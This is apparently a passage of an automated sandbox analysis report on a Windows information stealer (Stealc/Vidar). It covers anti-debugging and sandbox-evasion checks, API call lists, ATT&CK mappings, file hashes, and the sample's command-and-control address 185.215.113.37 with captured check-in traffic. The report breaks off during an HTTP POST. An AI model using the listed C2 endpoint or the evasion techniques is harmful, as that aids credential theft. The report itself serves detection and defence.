                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5100300 second address: 5100307 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5100364 second address: 510037F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1770B77EA7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 510037F second address: 5100391 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ecx, 18149631h 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5100391 second address: 5100395 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5100395 second address: 51003AD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1770F37A04h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 51003AD second address: 51003BF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F1770B77E9Eh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 51003BF second address: 510043C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1770F379FBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c pushad 0x0000000d push esi 0x0000000e movsx ebx, cx 0x00000011 pop eax 0x00000012 mov cx, bx 0x00000015 popad 0x00000016 mov ebp, esp 0x00000018 pushad 0x00000019 mov ebx, 25F7A6C8h 0x0000001e mov eax, ebx 0x00000020 popad 0x00000021 pop ebp 0x00000022 push eax 0x00000023 push edx 0x00000024 pushad 0x00000025 pushfd 0x00000026 jmp 00007F1770F37A04h 0x0000002b adc esi, 6EEE2928h 0x00000031 jmp 00007F1770F379FBh 0x00000036 popfd 0x00000037 pushfd 0x00000038 jmp 00007F1770F37A08h 0x0000003d and ax, 5B88h 0x00000042 jmp 00007F1770F379FBh 0x00000047 popfd 0x00000048 popad 0x00000049 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: D3EF8A second address: D3EFA1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F1770B77EA3h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: D3F321 second address: D3F340 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F1770F37A05h 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: D3F340 second address: D3F345 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exe | Special instruction interceptor: First address: B91A4B instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exe | Special instruction interceptor: First address: B91AEE instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exe | Special instruction interceptor: First address: D3285E instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exe | Special instruction interceptor: First address: B8F3AE instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exe | Special instruction interceptor: First address: D46AE4 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exe | Special instruction interceptor: First address: DBE9D4 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exe | Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
                Source: C:\Users\user\Desktop\file.exe | Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
                Source: C:\Users\user\Desktop\file.exe | Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
                Source: all processes | Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_009438B0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose, | 0_2_009438B0
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00944910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose, | 0_2_00944910
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0093DA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose, | 0_2_0093DA80
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0093E430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA, | 0_2_0093E430
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0093ED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose, | 0_2_0093ED20
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00944570 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen, | 0_2_00944570
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0093F68A FindFirstFileA, | 0_2_0093F68A
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0093F6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose, | 0_2_0093F6B0
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00943EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose, | 0_2_00943EA0
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_009316D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose, | 0_2_009316D0
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0093DE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose, | 0_2_0093DE10
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0093BE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose, | 0_2_0093BE70
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00931160 GetSystemInfo,ExitProcess, | 0_2_00931160
                Source: file.exe, file.exe, 00000000.00000002.2257369113.0000000000D12000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
                Source: file.exe, 00000000.00000002.2257803413.0000000001154000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2257803413.0000000001124000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
                Source: file.exe, 00000000.00000002.2257803413.00000000010DE000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: VMwareVMware
                Source: file.exe, 00000000.00000002.2257369113.0000000000D12000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
                Source: C:\Users\user\Desktop\file.exe | API call chain: ExitProcess graph end node | graph_0-13406
                Source: C:\Users\user\Desktop\file.exe | API call chain: ExitProcess graph end node | graph_0-13409
                Source: C:\Users\user\Desktop\file.exe | API call chain: ExitProcess graph end node | graph_0-13428
                Source: C:\Users\user\Desktop\file.exe | API call chain: ExitProcess graph end node | graph_0-13420
                Source: C:\Users\user\Desktop\file.exe | API call chain: ExitProcess graph end node | graph_0-13460
                Source: C:\Users\user\Desktop\file.exe | System information queried: ModuleInformation
                Source: C:\Users\user\Desktop\file.exe | Process information queried: ProcessInformation

                Anti Debugging

                Source: C:\Users\user\Desktop\file.exe | Thread information set: HideFromDebugger
                Source: C:\Users\user\Desktop\file.exe | Open window title or class name: regmonclass
                Source: C:\Users\user\Desktop\file.exe | Open window title or class name: gbdyllo
                Source: C:\Users\user\Desktop\file.exe | Open window title or class name: process monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exe | Open window title or class name: procmon_window_class
                Source: C:\Users\user\Desktop\file.exe | Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exe | Open window title or class name: ollydbg
                Source: C:\Users\user\Desktop\file.exe | Open window title or class name: filemonclass
                Source: C:\Users\user\Desktop\file.exe | Open window title or class name: file monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exe | File opened: NTICE
                Source: C:\Users\user\Desktop\file.exe | File opened: SICE
                Source: C:\Users\user\Desktop\file.exe | File opened: SIWVID
                Source: C:\Users\user\Desktop\file.exe | Process queried: DebugPort
                Source: C:\Users\user\Desktop\file.exe | Process queried: DebugPort
                Source: C:\Users\user\Desktop\file.exe | Process queried: DebugPort
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_009345C0 VirtualProtect ?,00000004,00000100,00000000 | 0_2_009345C0
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00949860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, | 0_2_00949860
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00949750 mov eax, dword ptr fs:[00000030h] | 0_2_00949750
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_009478E0 GetProcessHeap,RtlAllocateHeap,GetComputerNameA, | 0_2_009478E0
                Source: all processes | Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected
                Source: C:\Users\user\Desktop\file.exe | Memory protected: page guard

HIPS / PFW / Operating System Protection Evasion

Source: Yara match File source: Process Memory Space: file.exe PID: 2884, type: MEMORYSTR
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00949600 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle, 0_2_00949600
Source: file.exe, file.exe, 00000000.00000002.2257369113.0000000000D12000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: q2Program Manager
Source: C:\Users\user\Desktop\file.exe Code function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree, 0_2_00947B90
Source: C:\Users\user\Desktop\file.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00947980 GetProcessHeap,RtlAllocateHeap,GetLocalTime,wsprintfA, 0_2_00947980
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00947850 GetProcessHeap,RtlAllocateHeap,GetUserNameA, 0_2_00947850
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00947A30 GetProcessHeap,RtlAllocateHeap,GetTimeZoneInformation,wsprintfA, 0_2_00947A30

Stealing of Sensitive Information

Source: Yara match File source: 0.2.file.exe.930000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000002.2257198305.0000000000931000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.2216744474.0000000004F80000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.2257803413.00000000010DE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: file.exe PID: 2884, type: MEMORYSTR
Source: Yara match File source: dump.pcap, type: PCAP

Remote Access Functionality

Source: Yara match File source: 0.2.file.exe.930000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000002.2257198305.0000000000931000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.2216744474.0000000004F80000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.2257803413.00000000010DE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: file.exe PID: 2884, type: MEMORYSTR
Source: Yara match File source: dump.pcap, type: PCAP
MITRE ATT&CK Matrix (one line per tactic; the number in parentheses is the count of matching signatures for this sample, techniques without a number had no hits)

Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies
Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless
Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise
Execution: Command and Scripting Interpreter (2); Native API (11); At; Cron; Launchd; Scheduled Task; Systemd Timers; Container Orchestration Job
Persistence: DLL Side-Loading (1); Boot or Logon Initialization Scripts; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job
Privilege Escalation: Process Injection (11); DLL Side-Loading (1); Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job
Defense Evasion: Masquerading (1); Virtualization/Sandbox Evasion (33); Disable or Modify Tools (11); Process Injection (11); Deobfuscate/Decode Files or Information (1); Obfuscated Files or Information (3); Software Packing (12); DLL Side-Loading (1)
Credential Access: OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem
Discovery: System Time Discovery (2); Security Software Discovery (641); Virtualization/Sandbox Evasion (33); Process Discovery (13); Account Discovery (1); System Owner/User Discovery (1); File and Directory Discovery (1); System Information Discovery (324)
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services
Collection: Archive Collected Data (1); Data from Removable Media; Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking
Command and Control: Encrypted Channel (2); Ingress Tool Transfer (2); Non-Application Layer Protocol (2); Application Layer Protocol (12); Fallback Channels; Multiband Communication; Commonly Used Port; Application Layer Protocol
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol
Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement
Antivirus detection (sample)
Source | Detection | Scanner | Label
file.exe | 100% | Avira | TR/Crypt.TPM.Gen
file.exe | 100% | Joe Sandbox ML |
No Antivirus matches
No Antivirus matches
No Antivirus matches

Antivirus detection (URLs)
Source | Detection | Scanner | Label
http://185.215.113.37/ | 100% | URL Reputation | malware
http://185.215.113.37 | 100% | URL Reputation | malware
http://185.215.113.37/e2b1563c6670f193.php | 100% | URL Reputation | malware
http://185.215.113.37/ws | 100% | URL Reputation | malware
                No contacted domains info
Contacted URLs
Name | Malicious | Antivirus Detection | Reputation
http://185.215.113.37/ | true | URL Reputation: malware | unknown
http://185.215.113.37/e2b1563c6670f193.php | true | URL Reputation: malware | unknown

URLs from memory and binary strings
Name | Source | Malicious | Antivirus Detection | Reputation
http://185.215.113.37/e2b1563c6670f193.phpN | file.exe, 00000000.00000002.2257803413.000000000115B000.00000004.00000020.00020000.00000000.sdmp | true | | unknown
http://185.215.113.37 | file.exe, 00000000.00000002.2257803413.00000000010DE000.00000004.00000020.00020000.00000000.sdmp | true | URL Reputation: malware | unknown
http://185.215.113.37/# | file.exe, 00000000.00000002.2257803413.0000000001138000.00000004.00000020.00020000.00000000.sdmp | true | | unknown
http://185.215.113.37/e2b1563c6670f193.phpc% | file.exe, 00000000.00000002.2257803413.000000000115B000.00000004.00000020.00020000.00000000.sdmp | true | | unknown
http://185.215.113.37/ws | file.exe, 00000000.00000002.2257803413.0000000001138000.00000004.00000020.00020000.00000000.sdmp | true | URL Reputation: malware | unknown
http://185.215.113.37/e2b1563c6670f193.phpy | file.exe, 00000000.00000002.2257803413.0000000001138000.00000004.00000020.00020000.00000000.sdmp | true | | unknown
http://185.215.113.37/: | file.exe, 00000000.00000002.2257803413.0000000001138000.00000004.00000020.00020000.00000000.sdmp | true | | unknown
http://185.215.113.37S | file.exe, 00000000.00000002.2257803413.00000000010DE000.00000004.00000020.00020000.00000000.sdmp | true | | unknown
Contacted IPs
IP | Domain | Country | ASN | ASN Name | Malicious
185.215.113.37 | unknown | Portugal | 206894 | WHOLESALECONNECTIONSNL | true
General Information
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1542004
Start date and time: 2024-10-25 12:32:08 +02:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 3m 24s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 2
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: file.exe
Detection: MAL
Classification: mal100.troj.evad.winEXE@1/0@0/1
EGA Information:
• Successful, ratio: 100%
HCA Information:
• Successful, ratio: 80%
• Number of executed functions: 18
• Number of non-executed functions: 88
Cookbook Comments:
• Found application associated with file extension: .exe
• Stop behavior analysis, all processes terminated
• Exclude process from analysis (whitelisted): dllhost.exe
• Excluded IPs from analysis (whitelisted): 172.202.163.200
• Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, login.live.com, otelrules.azureedge.net, slscr.update.microsoft.com, sls.update.microsoft.com, ctldl.windowsupdate.com, glb.sls.prod.dcat.dsp.trafficmanager.net
• VT rate limit hit for: file.exe
                            No simulations
Context (IP match: 185.215.113.37)
Associated Sample Name / URL | Detection | Threat Name | Context
file.exe | malicious | Stealc, Vidar | 185.215.113.37/e2b1563c6670f193.php
file.exe | malicious | Stealc | 185.215.113.37/e2b1563c6670f193.php
file.exe | malicious | Stealc, Vidar | 185.215.113.37/e2b1563c6670f193.php
file.exe | malicious | Stealc | 185.215.113.37/e2b1563c6670f193.php
file.exe | malicious | Stealc, Vidar | 185.215.113.37/e2b1563c6670f193.php
file.exe | malicious | Stealc | 185.215.113.37/e2b1563c6670f193.php
file.exe | malicious | Stealc, Vidar | 185.215.113.37/e2b1563c6670f193.php
file.exe | malicious | Stealc | 185.215.113.37/e2b1563c6670f193.php
file.exe | malicious | Stealc, Vidar | 185.215.113.37/e2b1563c6670f193.php
file.exe | malicious | Stealc, Vidar | 185.215.113.37/e2b1563c6670f193.php
                            No context
Context (ASN match: WHOLESALECONNECTIONSNL)
Associated Sample Name / URL | Detection | Threat Name | Context
file.exe | malicious | Stealc, Vidar | 185.215.113.37
file.exe | malicious | Stealc | 185.215.113.37
file.exe | malicious | Stealc, Vidar | 185.215.113.37
file.exe | malicious | Stealc | 185.215.113.37
file.exe | malicious | Stealc, Vidar | 185.215.113.37
file.exe | malicious | Stealc | 185.215.113.37
file.exe | malicious | Stealc, Vidar | 185.215.113.37
file.exe | malicious | Stealc | 185.215.113.37
file.exe | malicious | Stealc, Vidar | 185.215.113.37
file.exe | malicious | Stealc, Vidar | 185.215.113.37
                            No context
                            No context
                            No created / dropped files found
Static File Info
File type: PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit): 7.947697383002452
TrID:
• Win32 Executable (generic) a (10002005/4) 99.96%
• Generic Win/DOS Executable (2004/3) 0.02%
• DOS Executable Generic (2002/1) 0.02%
• Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name: file.exe
File size: 1'839'104 bytes
MD5: e5554752275f657385f52a9200ce5d65
SHA1: 20111ab044d48a47dcd1240fd0b098f024c16bc4
SHA256: 75c80ec13c3aae80d4eaf263e35ac39fdc644b4b4eb7fab66a4217354bd7e5fd
SHA512: e91029e1c65c3bf2be9a3f0c9d9e17ae96c382d9dbd48110055f40e05bf2121b3db2e00d762bed3b289a4d844ad251cbba78817ad759e58fd9cb717c0dacd6a6
SSDEEP: 49152:MatHpe9XBzs4Klf6nO3TtwCncRoADt5P:MatHI9hsLx6OBwFj
TLSH: 178533674C211A96D74808F74183D576E3726E3391FEA6B2A31CA2C97319E493BF18DC
File Content Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........C..............X.......m.......Y.......p.....y.........`...............\.......n.....Rich............PE..L...J..f...........
Icon Hash: 00928e8e8686b000
Entrypoint: 0xa95000
Entrypoint Section: .taggant
Digitally signed: false
Imagebase: 0x400000
Subsystem: windows gui
Image File Characteristics: EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics: DYNAMIC_BASE, TERMINAL_SERVER_AWARE
Time Stamp: 0x66F99A4A [Sun Sep 29 18:19:54 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major: 5
OS Version Minor: 1
File Version Major: 5
File Version Minor: 1
Subsystem Version Major: 5
Subsystem Version Minor: 1
Import Hash: 2eabe9054cad5152567f0699947a2c5b
                            Programming Language:
                            • [C++] VS2010 build 30319
                            • [ASM] VS2010 build 30319
                            • [ C ] VS2010 build 30319
                            • [ C ] VS2008 SP1 build 30729
                            • [IMP] VS2008 SP1 build 30729
                            • [LNK] VS2010 build 30319
Data Directories
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x25d050 | 0x64 | .idata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x25d1f8 | 0x8 | .idata
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Sections
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
(unnamed) | 0x1000 | 0x25b000 | 0x22800 | 70e5209145ad193c2894a20a9311d1b0 | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0x25c000 | 0x1000 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata | 0x25d000 | 0x1000 | 0x200 | c60c4959cc8d384ac402730cc6842bb0 | False | 0.1328125 | data | 0.9064079259880791 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
(unnamed) | 0x25e000 | 0x29b000 | 0x200 | 268800d72eb70766d35f8ea1c2be6c49 | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
mpjgkmbj | 0x4f9000 | 0x19b000 | 0x19ae00 | b25e7ae0ed5278a5ed6f2d326c158ae4 | False | 0.9952078025174932 | data | 7.954876039100938 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
tclqnlva | 0x694000 | 0x1000 | 0x400 | d37aeb1484754ade810df636bcffafce | False | 0.7900390625 | data | 6.17189738004005 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.taggant | 0x695000 | 0x3000 | 0x2200 | 7320cf9a116c28d40f457d761e1db3cc | False | 0.06709558823529412 | DOS executable (COM) | 0.7868592380641317 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Imports
DLL | Import
kernel32.dll | lstrcpy
Suricata IDS Alerts
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-10-25T12:33:22.999220+0200 | 2044243 | ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in | 1 | 192.168.2.5 | 49721 | 185.215.113.37 | 80 | TCP
TCP Packets
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Oct 25, 2024 12:33:21.466238022 CEST | 49721 | 80 | 192.168.2.5 | 185.215.113.37
Oct 25, 2024 12:33:21.472590923 CEST | 80 | 49721 | 185.215.113.37 | 192.168.2.5
Oct 25, 2024 12:33:21.472688913 CEST | 49721 | 80 | 192.168.2.5 | 185.215.113.37
Oct 25, 2024 12:33:21.472837925 CEST | 49721 | 80 | 192.168.2.5 | 185.215.113.37
Oct 25, 2024 12:33:21.478163004 CEST | 80 | 49721 | 185.215.113.37 | 192.168.2.5
Oct 25, 2024 12:33:22.379336119 CEST | 80 | 49721 | 185.215.113.37 | 192.168.2.5
Oct 25, 2024 12:33:22.379540920 CEST | 49721 | 80 | 192.168.2.5 | 185.215.113.37
Oct 25, 2024 12:33:22.712996006 CEST | 49721 | 80 | 192.168.2.5 | 185.215.113.37
Oct 25, 2024 12:33:22.718571901 CEST | 80 | 49721 | 185.215.113.37 | 192.168.2.5
Oct 25, 2024 12:33:22.999056101 CEST | 80 | 49721 | 185.215.113.37 | 192.168.2.5
Oct 25, 2024 12:33:22.999219894 CEST | 49721 | 80 | 192.168.2.5 | 185.215.113.37
Oct 25, 2024 12:33:24.940182924 CEST | 49721 | 80 | 192.168.2.5 | 185.215.113.37

HTTP Sessions
• 185.215.113.37
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.5 | 49721 | 185.215.113.37 | 80 | 2884 | C:\Users\user\Desktop\file.exe
Timestamp | Bytes transferred | Direction | Data
Oct 25, 2024 12:33:21.472837925 CEST | 89 | OUT | GET / HTTP/1.1
Host: 185.215.113.37
Connection: Keep-Alive
Cache-Control: no-cache
Oct 25, 2024 12:33:22.379336119 CEST | 203 | IN | HTTP/1.1 200 OK
Date: Fri, 25 Oct 2024 10:33:22 GMT
Server: Apache/2.4.52 (Ubuntu)
Content-Length: 0
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Oct 25, 2024 12:33:22.712996006 CEST | 412 | OUT | POST /e2b1563c6670f193.php HTTP/1.1
Content-Type: multipart/form-data; boundary=----FBGCAAAAFBKEBFHJEGCF
Host: 185.215.113.37
Content-Length: 211
